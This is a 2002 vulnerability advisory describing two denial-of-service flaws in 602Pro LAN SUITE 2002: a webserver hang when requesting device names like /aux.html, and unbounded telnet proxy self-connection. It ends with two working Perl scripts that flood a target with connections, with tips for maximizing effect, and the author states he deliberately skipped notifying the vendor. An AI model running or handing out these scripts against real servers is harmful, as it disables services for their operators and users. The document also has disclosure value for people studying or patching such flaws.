Date: August 3, 2002 Author: Stan Bubrouski Product: 602Pro LAN SUITE 2002 Version: 2002 Vendor: Software602, Inc. Summary: Denial of Service attacks in webserver and telnet proxy Description: There are two denial of service attacks in 602Pro LAN SUITE 2002 for windows. The problems are described below. Problem 1: Webserver/Webmail windows device name DoS attack The webserver component of Lan Suite does not filter out requests for files that contain device names. This means that if you request say "/aux.html" the server attemps to read that device as a file and thus that thread hangs. This also means memory and CPU are associated with that thread that cannot be recovered. By automating connecting and requesting that file it is possible to cause the Lansuite.exe to quickly consume hundreds of megabytes of memory and raise CPU usage to 100% affecting achieving a Denial-of-Service attack against Lan Suite. Even after the attack is completed there is no way to lower the system resources (i.e. MEM, CPU) until the process is killed. Problem 2: The telnet proxy is vulnerable to a DoS attack The telnet proxy allows connections to localhost essentially allowing you to connect to the proxy through the proxy, without limit. For example: Telnet Gateway ready, enter computer name to connect to. host[:port]: localhost:23 Telnet Gateway ready, enter computer name to connect to. host[:port]: localhost:23 Telnet Gateway ready, enter computer name to connect to. host[:port]: localhost:23 Telnet Gateway ready, enter computer name to connect to. Automating this process causes the Lansuite.exe process to consume more and more memory as long as the connection remains active, thus allowing resource exhaustion, by doing this hundreds of times. 012345678901234567890123456789012345678901234567890 Solution: Because no support e-mail address or phone number are available which do not require product registration, I did not report this to the vendor. There was a bug report form, but I hate the idiotic format of these webbased forms and the lack of response you get from them. To me it's clear if a vendor cared about the quality of of its product they would provide a simple e-mail address you could report problems to without having to pay for registration. So in other words, let them burn, I don't care if they don't. Attached are two small proof of concept exploits for the problems.
#!/usr/bin/perl # # lansuite-proxy-DoS.pl - 602Pro LAN SUITE 2002 telnet proxy DoS # # Note: Try very high number of connections and run multiple instances # of the script for quick results. # # Date: August 3, 2002 # Author: Stan Bubrouski (stan@ccs.neu.edu) if (!$ARGV[2]) { print "Usage $0 <hostname> <port> <connections>\n\n"; exit(); } $host = $ARGV[0]; $port = $ARGV[1]; $numc = $ARGV[2]; use Net::Telnet (); $t = new Net::Telnet; $t->open(Host => $host,Port => $port); foreach(1...$numc) { $t->waitfor('/.*host.*/'); $t->print('localhost:23'); }
#!/usr/bin/perl # # lansuite-webserver-DoS.pl - 602Pro LAN SUITE 2002 webserver DoS # # Note: Try using a connections setting of 100000+ for obvious results # # Date: August 3, 2002 # Author: Stan Bubrouski (stan@ccs.neu.edu) use IO::Socket; if (!$ARGV[2]) { print "Usage $0 <hostname> <port> <connections>\n\n"; exit(); } $host = $ARGV[0]; $port = $ARGV[1]; $numc = $ARGV[2]; foreach(1...$numc) { $sock = IO::Socket::INET->new( PeerAddr => "$host", Proto => "tcp", PeerPort => "$port"); print $sock "GET /aux.html HTTP/1.0\r\n"; }